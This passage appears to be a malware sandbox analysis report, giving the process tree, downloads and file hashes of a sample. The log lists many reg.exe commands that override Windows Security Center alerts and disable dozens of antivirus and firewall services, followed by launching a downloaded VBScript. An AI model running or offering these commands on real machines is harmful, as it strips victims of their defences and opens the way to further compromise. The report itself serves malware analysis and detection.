C:\Windows\SysWOW64\reg.exereg add "HKLM\software\microsoft\security center" /v AntiVirusOverride /t REG_DWORD /d 4 /f4⤵
- Windows security bypass
PID:1524
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\software\microsoft\security center" /v FirewallDisableNotify /t REG_DWORD /d 4 /f4⤵
- Windows security bypass
PID:1648
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\software\microsoft\security center" /v FirewallOverride /t REG_DWORD /d 4 /f4⤵
- Windows security bypass
PID:1412
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\software\microsoft\security center" /v FirstRunDisabled /t REG_DWORD /d 4 /f4⤵PID:1776
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\software\microsoft\security center" /v UpdatesDisableNotify /t REG_DWORD /d 4 /f4⤵
- Windows security bypass
PID:1532
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset001\services\SharedAcce ss" /v Start /t REG_DWORD /d 4 /f4⤵PID:1544
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset001\services\SharedAcce ss" /v ErrorControl /t REG_DWORD /d 4 /f4⤵PID:1220
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset002\services\SharedAcce ss" /v Start /t REG_DWORD /d 4 /f4⤵PID:1948
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset002\services\SharedAcce ss" /v ErrorControl /t REG_DWORD /d 4 /f4⤵PID:1540
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\currentcontrolset\services\SharedAcce ss" /v Start /t REG_DWORD /d 4 /f4⤵PID:1088
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\currentcontrolset\services\SharedAcce ss" /v ErrorControl /t REG_DWORD /d 4 /f4⤵PID:692
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset002\services\AVPCC" /v Start /t REG_DWORD /d 4 /f4⤵PID:540
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset001\services\AVPCC" /v Start /t REG_DWORD /d 4 /f4⤵PID:1828
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\currentcontrolset\services\AVPCC" /v Start /t REG_DWORD /d 4 /f4⤵PID:552
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset001\services\Amon" /v Start /t REG_DWORD /d 4 /f4⤵PID:924
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset002\services\Amon" /v Start /t REG_DWORD /d 4 /f4⤵PID:848
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\currentcontrolset\services\Amon" /v Start /t REG_DWORD /d 4 /f4⤵PID:1668
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset001\services\Apvxd" /v Start /t REG_DWORD /d 4 /f4⤵PID:832
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset002\services\Apvxd" /v Start /t REG_DWORD /d 4 /f4⤵PID:1908
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\currentcontrolset\services\Apvxd" /v Start /t REG_DWORD /d 4 /f4⤵PID:476
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset001\services\Apvxdwin" /v Start /t REG_DWORD /d 4 /f4⤵PID:1528
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset002\services\Apvxdwin" /v Start /t REG_DWORD /d 4 /f4⤵PID:2016
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\currentcontrolset\services\Apvxdw in" /v Start /t REG_DWORD /d 4 /f4⤵PID:1920
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset001\services\Atrack" /v Start /t REG_DWORD /d 4 /f4⤵PID:1808
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset002\services\Atrack" /v Start /t REG_DWORD /d 4 /f4⤵PID:1924
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\currentcontrolset\services\Atrack " /v Start /t REG_DWORD /d 4 /f4⤵PID:2012
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset001\services\AvconsoleE XE" /v Start /t REG_DWORD /d 4 /f4⤵PID:1596
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset002\services\AvconsoleE XE" /v Start /t REG_DWORD /d 4 /f4⤵PID:1696
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\currentcontrolset\services\AvconsoleE XE" /v Start /t REG_DWORD /d 4 /f4⤵PID:996
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset001\services\AVG_CC" /v Start /t REG_DWORD /d 4 /f4⤵PID:1996
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset002\services\AVG_CC" /v Start /t REG_DWORD /d 4 /f4⤵PID:1564
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\currentcontrolset\services\AVG_CC " /v Start /t REG_DWORD /d 4 /f4⤵PID:1476
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset001\services\avgcc32" /v Start /t REG_DWORD /d 4 /f4⤵PID:1204
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset002\services\avgcc32" /v Start /t REG_DWORD /d 4 /f4⤵PID:1320
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\currentcontrolset\services\avgcc3 2" /v Start /t REG_DWORD /d 4 /f4⤵PID:1584
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset001\services\avgserv9" /v Start /t REG_DWORD /d 4 /f4⤵PID:1784
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset002\services\avgserv9" /v Start /t REG_DWORD /d 4 /f4⤵PID:1212
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\currentcontrolset\services\avgser v9" /v Start /t REG_DWORD /d 4 /f4⤵PID:1676
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset001\services\AVPCC Service" /v Start /t REG_DWORD /d 4 /f4⤵PID:804
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset002\services\AVPCC Service" /v Start /t REG_DWORD /d 4 /f4⤵PID:1640
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\currentcontrolset\services\AVPCC Service" /v Start /t REG_DWORD /d 4 /f4⤵PID:1972
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset001\services\BlackIce Utility" /v Start /t REG_DWORD /d 4 /f4⤵PID:1060
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset002\services\BlackIce Utility" /v Start /t REG_DWORD /d 4 /f4⤵PID:772
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\currentcontrolset\services\BlackI ce Utility" /v Start /t REG_DWORD /d 4 /f4⤵PID:1624
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset001\services\CcApp" /v Start /t REG_DWORD /d 4 /f4⤵PID:1144
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset002\services\CcApp" /v Start /t REG_DWORD /d 4 /f4⤵PID:1752
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\currentcontrolset\services\CcApp" /v Start /t REG_DWORD /d 4 /f4⤵PID:392
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset001\services\CcRegVfy" /v Start /t REG_DWORD /d 4 /f4⤵PID:1660
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset002\services\CcApp" /v Start /t REG_DWORD /d 4 /f4⤵PID:1216
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\currentcontrolset\services\CcApp" /v Start /t REG_DWORD /d 4 /f4⤵PID:1880
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset001\services\ConfigSafe " /v Start /t REG_DWORD /d 4 /f4⤵PID:1744
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset002\services\ConfigSafe " /v Start /t REG_DWORD /d 4 /f4⤵PID:1608
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\currentcontrolset\services\ConfigSafe " /v Start /t REG_DWORD /d 4 /f4⤵PID:1188
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset001\services\CPD_EXE" /v Start /t REG_DWORD /d 4 /f4⤵PID:1844
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset002\services\CPD_EXE" /v Start /t REG_DWORD /d 4 /f4⤵PID:1124
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\currentcontrolset\services\CPD_EX E" /v Start /t REG_DWORD /d 4 /f4⤵PID:1780
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset001\services\Defwatch" /v Start /t REG_DWORD /d 4 /f4⤵PID:992
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset002\services\Defwatch" /v Start /t REG_DWORD /d 4 /f4⤵PID:1496
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\currentcontrolset\services\Defwat ch" /v Start /t REG_DWORD /d 4 /f4⤵PID:1292
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset001\services\dvpapi9x" /v Start /t REG_DWORD /d 4 /f4⤵PID:1724
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset002\services\dvpapi9x" /v Start /t REG_DWORD /d 4 /f4⤵PID:360
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\currentcontrolset\services\dvpapi 9x" /v Start /t REG_DWORD /d 4 /f4⤵PID:2044
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset001\services\Fix-it" /v Start /t REG_DWORD /d 4 /f4⤵PID:1764
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset002\services\Fix-it" /v Start /t REG_DWORD /d 4 /f4⤵PID:952
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\currentcontrolset\services\Fix-it" /v Start /t REG_DWORD /d 4 /f4⤵PID:1988
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset001\services\Fix-it AV" /v Start /t REG_DWORD /d 4 /f4⤵PID:1632
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset002\services\Fix-it AV" /v Start /t REG_DWORD /d 4 /f4⤵PID:900
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\currentcontrolset\services\Fix-it AV" /v Start /t REG_DWORD /d 4 /f4⤵PID:364
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset001\services\Freedom" /v Start /t REG_DWORD /d 4 /f4⤵PID:1416
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset002\services\Freedom" /v Start /t REG_DWORD /d 4 /f4⤵PID:824
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\currentcontrolset\services\Freedo m" /v Start /t REG_DWORD /d 4 /f4⤵PID:1932
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset001\services\F-StopW" /v Start /t REG_DWORD /d 4 /f4⤵PID:2036
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset002\services\F-StopW" /v Start /t REG_DWORD /d 4 /f4⤵PID:1688
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\currentcontrolset\services\F-StopW" /v Start /t REG_DWORD /d 4 /f4⤵PID:1704
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset001\services\iamapp" /v Start /t REG_DWORD /d 4 /f4⤵PID:1072
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset002\services\iamapp" /v Start /t REG_DWORD /d 4 /f4⤵PID:1432
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\currentcontrolset\services\iamapp " /v Start /t REG_DWORD /d 4 /f4⤵PID:1536
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset001\services\Look 'n' Stop" /v Start /t REG_DWORD /d 4 /f4⤵PID:1140
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset002\services\Look 'n' Stop" /v Start /t REG_DWORD /d 4 /f4⤵PID:560
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\currentcontrolset\services\Look 'n' Stop" /v Start /t REG_DWORD /d 4 /f4⤵PID:864
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset001\services\McAfee Firewall" /v Start /t REG_DWORD /d 4 /f4⤵PID:1840
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset002\services\McAfee Firewall" /v Start /t REG_DWORD /d 4 /f4⤵PID:1480
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\currentcontrolset\services\McAfee Firewall" /v Start /t REG_DWORD /d 4 /f4⤵PID:1300
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset001\services\McAfee Winguage" /v Start /t REG_DWORD /d 4 /f4⤵PID:776
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset002\services\McAfee Firewall" /v Start /t REG_DWORD /d 4 /f4⤵PID:980
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\currentcontrolset\services\McAfee Firewall" /v Start /t REG_DWORD /d 4 /f4⤵PID:1208
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset001\services\McAfee.Instant Update.Monitor" /v Start /t REG_DWORD /d 4 /f4⤵PID:856
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset002\services\McAfee.Instant Update.Monitor" /v Start /t REG_DWORD /d 4 /f4⤵PID:624
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\currentcontrolset\services\McAfee.Ins tantUpdate.Monitor" /v Start /t REG_DWORD /d 4 /f4⤵PID:1928
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset001\services\McAfeeVirusSca nService" /v Start /t REG_DWORD /d 4 /f4⤵PID:1836
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset002\services\McAfeeVirusSca nService" /v Start /t REG_DWORD /d 4 /f4⤵PID:1028
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\currentcontrolset\services\McAfeeViru sScanService" /v Start /t REG_DWORD /d 4 /f4⤵PID:1592
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset001\services\NAV Agent" /v Start /t REG_DWORD /d 4 /f4⤵PID:324
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset002\services\NAV Agent" /v Start /t REG_DWORD /d 4 /f4⤵PID:1428
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\currentcontrolset\services\NAV Agent" /v Start /t REG_DWORD /d 4 /f4⤵PID:1600
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset001\services\NAV Configuration Wizard" /v Start /t REG_DWORD /d 4 /f4⤵PID:1968
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset002\services\NAV Configuration Wizard" /v Start /t REG_DWORD /d 4 /f4⤵PID:1628
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\currentcontrolset\services\NAV Configuration Wizard" /v Start /t REG_DWORD /d 4 /f4⤵PID:1916
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset001\services\NAV DefAlert" /v Start /t REG_DWORD /d 4 /f4⤵PID:1100
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset002\services\NAV Configuration Wizard" /v Start /t REG_DWORD /d 4 /f4⤵PID:1820
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\currentcontrolset\services\NAV Configuration Wizard" /v Start /t REG_DWORD /d 4 /f4⤵PID:1120
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset001\services\Nod32CC" /v Start /t REG_DWORD /d 4 /f4⤵PID:2008
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset002\services\Nod32CC" /v Start /t REG_DWORD /d 4 /f4⤵PID:1984
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\CURRENTcontrolset\services\Nod32C C" /v Start /t REG_DWORD /d 4 /f4⤵PID:1108
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset001\services\NOD32POP3" /v Start /t REG_DWORD /d 4 /f4⤵PID:928
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset002\services\NOD32POP3" /v Start /t REG_DWORD /d 4 /f4⤵PID:1568
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\currentcontrolset\services\NOD32P OP3" /v Start /t REG_DWORD /d 4 /f4⤵PID:1992
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset001\services\Norton Auto-Protect" /v Start /t REG_DWORD /d 4 /f4⤵PID:1516
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset002\services\Norton Auto-Protect" /v Start /t REG_DWORD /d 4 /f4⤵PID:1512
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\currentcontrolset\services\Norton Auto-Protect" /v Start /t REG_DWORD /d 4 /f4⤵PID:828
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset001\services\Norton eMail Protect" /v Start /t REG_DWORD /d 4 /f4⤵PID:1468
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset002\services\Norton eMail Protect" /v Start /t REG_DWORD /d 4 /f4⤵PID:1548
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\currentcontrolset\services\Norton eMail Protect" /v Start /t REG_DWORD /d 4 /f4⤵PID:1728
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset001\services\Norton Navigaton Loader" /v Start /t REG_DWORD /d 4 /f4⤵PID:1472
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset002\services\Norton Navigaton Loader" /v Start /t REG_DWORD /d 4 /f4⤵PID:1092
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\currentcontrolset\services\Norton Navigaton Loader" /v Start /t REG_DWORD /d 4 /f4⤵PID:1056
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset001\services\Norton Program Scheduler" /v Start /t REG_DWORD /d 4 /f4⤵PID:1000
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset002\services\Norton Program Scheduler" /v Start /t REG_DWORD /d 4 /f4⤵PID:604
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\currentcontrolset\services\Norton Program Scheduler" /v Start /t REG_DWORD /d 4 /f4⤵PID:1168
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset001\services\Norton Program Event Checker" /v Start /t REG_DWORD /d 4 /f4⤵PID:1240
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset002\services\Norton Program Event Checker" /v Start /t REG_DWORD /d 4 /f4⤵PID:1652
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\currentcontrolset\services\Norton Program Event Checker" /v Start /t REG_DWORD /d 4 /f4⤵PID:2020
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset001\services\NPS Event Checker" /v Start /t REG_DWORD /d 4 /f4⤵PID:1604
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset002\services\NPS Event Checker" /v Start /t REG_DWORD /d 4 /f4⤵PID:1844
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\currentcontrolset\services\NPS Event Checker" /v Start /t REG_DWORD /d 4 /f4⤵PID:1124
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset001\services\Panda Scheduler" /v Start /t REG_DWORD /d 4 /f4⤵PID:1780
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset002\services\Panda Scheduler" /v Start /t REG_DWORD /d 4 /f4⤵PID:992
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\currentcontrolset\services\Panda Scheduler" /v Start /t REG_DWORD /d 4 /f4⤵PID:1496
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset001\services\ScanInicio " /v Start /t REG_DWORD /d 4 /f4⤵PID:1292
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset002\services\ScanInicio " /v Start /t REG_DWORD /d 4 /f4⤵PID:1724
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\currentcontrolset\services\ScanInicio " /v Start /t REG_DWORD /d 4 /f4⤵PID:360
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset001\services\SymTray - Norton SystemWorks" /v Start /t REG_DWORD /d 4 /f4⤵PID:2044
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset002\services\SymTray - Norton SystemWorks" /v Start /t REG_DWORD /d 4 /f4⤵PID:1764
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\currentcontrolset\services\SymTra y - Norton SystemWorks" /v Start /t REG_DWORD /d 4 /f4⤵PID:952
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset001\services\Tiny Personal Firewall" /v Start /t REG_DWORD /d 4 /f4⤵PID:1988
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset002\services\Tiny Personal Firewall" /v Start /t REG_DWORD /d 4 /f4⤵PID:1632
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\currentcontrolset\services\Tiny Personal Firewall" /v Start /t REG_DWORD /d 4 /f4⤵PID:900
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset001\services\TrueVector " /v Start /t REG_DWORD /d 4 /f4⤵PID:364
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset002\services\TrueVector " /v Start /t REG_DWORD /d 4 /f4⤵PID:1416
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\currentcontrolset\services\TrueVector " /v Start /t REG_DWORD /d 4 /f4⤵PID:824
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset001\services\VirusScan Online" /v Start /t REG_DWORD /d 4 /f4⤵PID:1932
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset002\services\VirusScan Online" /v Start /t REG_DWORD /d 4 /f4⤵PID:2036
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\currentcontrolset\services\VirusS can Online" /v Start /t REG_DWORD /d 4 /f4⤵PID:1688
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset001\services\ZoneAlarm" /v Start /t REG_DWORD /d 4 /f4⤵PID:1704
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\controlset002\services\ZoneAlarm" /v Start /t REG_DWORD /d 4 /f4⤵PID:1072
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\system\currentcontrolset\services\ZoneAl arm" /v Start /t REG_DWORD /d 4 /f4⤵PID:1432
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dl.vbs"4⤵PID:1088
-
-
C:\Windows\SysWOW64\PING.EXEPING 127.0.0.1 -n 604⤵
- Runs ping.exe
PID:692
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
62KB
MD51f4e38dfb8a47410353a22260c63870c
SHA126c4098ccae89670171c80d6d5c530ff368462a9
SHA2568d01f2e9789ead191a05f0dd25a5db6c5e8e397701ec080bdb0fdab86a732095
SHA512b4f2b734839835e42a1ea9fd59e018b8380ab65725e34a70706730235a48ac7856ea7c7ed1034d7d28430a5bd8e4c487c5d93918790f24b2efd8cf6343b579dd
-
Filesize
62KB
MD51f4e38dfb8a47410353a22260c63870c
SHA126c4098ccae89670171c80d6d5c530ff368462a9
SHA2568d01f2e9789ead191a05f0dd25a5db6c5e8e397701ec080bdb0fdab86a732095
SHA512b4f2b734839835e42a1ea9fd59e018b8380ab65725e34a70706730235a48ac7856ea7c7ed1034d7d28430a5bd8e4c487c5d93918790f24b2efd8cf6343b579dd
-
Filesize
54KB
MD53e0b3c608056055e4332e59f31e626bc
SHA138c47ebba8da1403f52ff8b0dd299cf3ff41e32d
SHA256c84eb811d92d2ff6e7064c847b73ee4688fe561951531e8559da91b330ae0ece
SHA512b7795e514491675d4fc9dc88e80cd613694d76055f35c5160b4f53f08920f4df6fc14f14ac2f95d86cae323e80893662efcc7db3b5e407cf159beb86c561fd35
-
Filesize
834B
MD554b3e6509917d44df16c4ccdfaa3fba7
SHA1b94c42d52537b6229715f4b47bed2318aa74d779
SHA2568daf8c3658a254ae616da34c7f35ee31e0b71827410fef19b20e579d40bfda01
SHA51203fe54a0720195d8ba244f5e9ccf300a2621bf4512fe43a5cbd593d60a4b342009e17b1237ca27423be2d3ebb764b25d145eaad3cd595dec2165ff31e2de8028
-
Filesize
62KB
MD51f4e38dfb8a47410353a22260c63870c
SHA126c4098ccae89670171c80d6d5c530ff368462a9
SHA2568d01f2e9789ead191a05f0dd25a5db6c5e8e397701ec080bdb0fdab86a732095
SHA512b4f2b734839835e42a1ea9fd59e018b8380ab65725e34a70706730235a48ac7856ea7c7ed1034d7d28430a5bd8e4c487c5d93918790f24b2efd8cf6343b579dd
-
Filesize
62KB
MD51f4e38dfb8a47410353a22260c63870c
SHA126c4098ccae89670171c80d6d5c530ff368462a9
SHA2568d01f2e9789ead191a05f0dd25a5db6c5e8e397701ec080bdb0fdab86a732095
SHA512b4f2b734839835e42a1ea9fd59e018b8380ab65725e34a70706730235a48ac7856ea7c7ed1034d7d28430a5bd8e4c487c5d93918790f24b2efd8cf6343b579dd